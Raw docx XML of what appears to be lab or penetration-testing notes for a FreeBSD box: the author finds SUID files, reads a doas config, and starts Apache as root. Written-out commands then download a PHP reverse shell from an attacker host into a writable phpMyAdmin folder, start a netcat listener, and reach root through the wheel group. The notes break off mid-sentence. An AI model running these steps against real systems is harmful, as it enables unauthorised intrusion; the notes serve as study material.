      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find files with SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002211">
      <w:pPr>
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="825500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85" name="image76.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image76.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId725"/>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2212">
      <w:pPr>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2213">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>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138613" cy="2142209"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="287" name="image292.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image292.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId726"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4138613" cy="2142209"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002214">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here from the LinPeas, we see SUID bit set for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/bin/doas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002215">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>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762500" cy="3644900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="489" name="image472.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image472.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId727"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47625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2216">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS automatically prints out the conf file, which tells us what we are allowed to do with doas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002217">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So basically, almost everything here is commented out, except for two lines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002218">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>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permit nopass :wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>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permit nopass andrew as root cmd service args apache24 onestart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it says "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mandrew</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" in the output but it’s a typo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apache24 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">refers to Apache HTTP Server version 2.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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permit nopass :wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As explained in the comment above this line, anyone in the wheel group can run ANY command as root. So, the goal should be to get access to a user in wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">permit nopass andrew as root cmd service args</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache24 onestart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="e84c22"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This line allows the user andrew to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service apache24 onestart</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root without needing a password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002220">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : this means the command service  is the only command we are allowed to run as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002221">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">args apache24 onestart </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: this means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apache24 onestart</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the argument we are allowed to use with the service command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002222">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, based on this, we can run this command to start apache server. This will allow us to pivot to www-data user or whoever is running web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002223">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>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doas service apache24 onestart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002224">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>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doas service apache24 onestart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002225">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we could have also ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/bin/doas service apache24 onestart</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify the full path for doas, but it must have been added to PATH variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002226">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>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635000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="492" name="image471.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image471.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId728"/>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2227">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First, we have to figure out the root directory of the apache server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002228">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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grep -i 'DocumentRoot' /usr/local/etc/apache24/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002229">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This searches up the config file for the document root path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output was: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DocumentRoot "/usr/local/www/apache24/data"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222B">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So, now we should cd into document root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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cd /usr/local/www/apache24/data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222D">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And now, we can put reverse shell into here, and then visit it manually. but we have to first find a location we can write the reverse shell into.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222E">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After enumerating, we find we can write to /phpMyAdmin/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/www/apache24/data/phpMyAdmin/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002230">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:hyperlink r:id="rId729">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId730">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.45.232/rev.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o rev.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002231">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And then start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002233">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Then visit the site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002234">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://172.16.xxx.20/phpMyAdmin/tmp/rev.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002235">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After getting a shell back as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002236">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we see that www-data user is part of wheel group (using the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) so that means they can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">doas </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root (as shown in the config file). You can actually </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">priv esc to root on www</w:t>
      </w:r>
